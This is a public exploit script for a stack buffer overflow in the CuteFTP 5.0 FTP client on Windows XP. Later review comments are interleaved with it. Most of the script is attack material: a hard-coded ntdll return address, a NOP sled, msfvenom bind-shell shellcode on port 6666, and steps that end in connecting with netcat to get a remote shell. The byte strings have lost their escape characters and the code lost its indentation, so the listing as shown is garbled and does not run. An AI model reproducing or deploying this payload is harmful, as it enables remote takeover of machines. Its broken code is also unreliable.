# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Professional SP3 English x86

# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP address.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately

# NOTE(review): this listing appears to have been mangled in transit. The
# byte-string literals below carry no escape backslashes and the try/except
# body has lost its indentation, so the text as shown is not a byte-accurate
# copy of the original script and does not parse as Python.

# Hard-coded return address. Per the author's comment it points into
# ntdll.dll at 7C91FCD8; the four values are listed in reverse (little-endian)
# order. An absolute address inside a system DLL is only meaningful on the
# exact OS build named in the header (Windows XP Professional SP3 English x86):
# a different build, or ASLR on later Windows versions, moves that module.
ret="xD8xFCx91x7C" #ntdll.dll 7C91FCD8
# Thirty repetitions of the 0x90 (x86 NOP) value, placed between the return
# address and the shellcode when the buffer is assembled below.
nops = 'x90'*30

# Shellcode as emitted by the msfvenom command quoted on the next line: a
# Windows bind shell on TCP port 6666, encoded to exclude the bytes 0x0a,
# 0x00 and 0x0d.
# Detection: a listening socket on TCP 6666 owned by the CuteFTP process, or
# that process spawning a command interpreter, is the observable effect of
# this payload (step 7 in the header connects to the same port).
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b 'x0ax00x0d' -f python
sc = ""
sc += "xdbxd8xb8xa7x37x29x0exd9x74x24xf4x5bx33"
sc += "xc9xb1x53x31x43x17x83xebxfcx03xe4x24xcb"
sc += "xfbx16xa2x89x04xe6x33xeex8dx03x02x2exe9"
sc += "x40x35x9ex79x04xbax55x2fxbcx49x1bxf8xb3"
sc += "xfax96xdexfaxfbx8bx23x9dx7fxd6x77x7dx41"
sc += "x19x8ax7cx86x44x67x2cx5fx02xdaxc0xd4x5e"
sc += "xe7x6bxa6x4fx6fx88x7fx71x5ex1fx0bx28x40"
sc += "x9exd8x40xc9xb8x3dx6cx83x33xf5x1ax12x95"
sc += "xc7xe3xb9xd8xe7x11xc3x1dxcfxc9xb6x57x33"
sc += "x77xc1xacx49xa3x44x36xe9x20xfex92x0bxe4"
sc += "x99x51x07x41xedx3dx04x54x22x36x30xddxc5"
sc += "x98xb0xa5xe1x3cx98x7ex8bx65x44xd0xb4x75"
sc += "x27x8dx10xfexcaxdax28x5dx83x2fx01x5dx53"
sc += "x38x12x2ex61xe7x88xb8xc9x60x17x3fx2dx5b"
sc += "xefxafxd0x64x10xe6x16x30x40x90xbfx39x0b"
sc += "x60x3fxecxa6x68xe6x5fxd5x95x58x30x59x35"
sc += "x31x5ax56x6ax21x65xbcx03xcax98x3fx31x01"
sc += "x14xd9x2fx05x70x71xc7xe7xa7x4ax70x17x82"
sc += "xe2x16x50xc4x35x19x61xc2x11x8dxeax01xa6"
sc += "xacxecx0fx8exb9x7bxc5x5fx88x1axdax75x7a"
sc += "xbex49x12x7axc9x71x8dx2dx9ex44xc4xbbx32"
sc += "xfex7exd9xcex66xb8x59x15x5bx47x60xd8xe7"
sc += "x63x72x24xe7x2fx26xf8xbexf9x90xbex68x48"
sc += "x4ax69xc6x02x1axecx24x95x5cxf1x60x63x80"
sc += "x40xddx32xbfx6dx89xb2xb8x93x29x3cx13x10"
sc += "x59x77x39x31xf2xdexa8x03x9fxe0x07x47xa6"
sc += "x62xadx38x5dx7axc4x3dx19x3cx35x4cx32xa9"
sc += "x39xe3x33xf8"

# Layout of the string pasted into the Site Manager 'label' field (step 3):
# 520 filler characters, the return address, the NOP run, the shellcode, then
# "C" padding sized so that shellcode plus padding is always 3572 characters.
# Presumably 520 is the distance from the start of the label buffer to the
# saved return address - TODO confirm against the vulnerable binary.
# Root cause, as far as this script shows: the client accepts a label far
# longer than its buffer. Length-checking the field is the fix on the vendor
# side; for operators the options are retiring this 2018-reported legacy build
# and treating site entries and generated shortcut executables (steps 4-6)
# from other parties as untrusted input.
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
# Writes the assembled string to exploit.txt in the current directory.
# Python 2 syntax (print statement). The file is opened in text mode "w" and
# closed by hand rather than with a context manager.
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
# Bare except: any exception raised above, not only a failure to create the
# file, is reported with the same generic message.
except:
print "File cannot be created"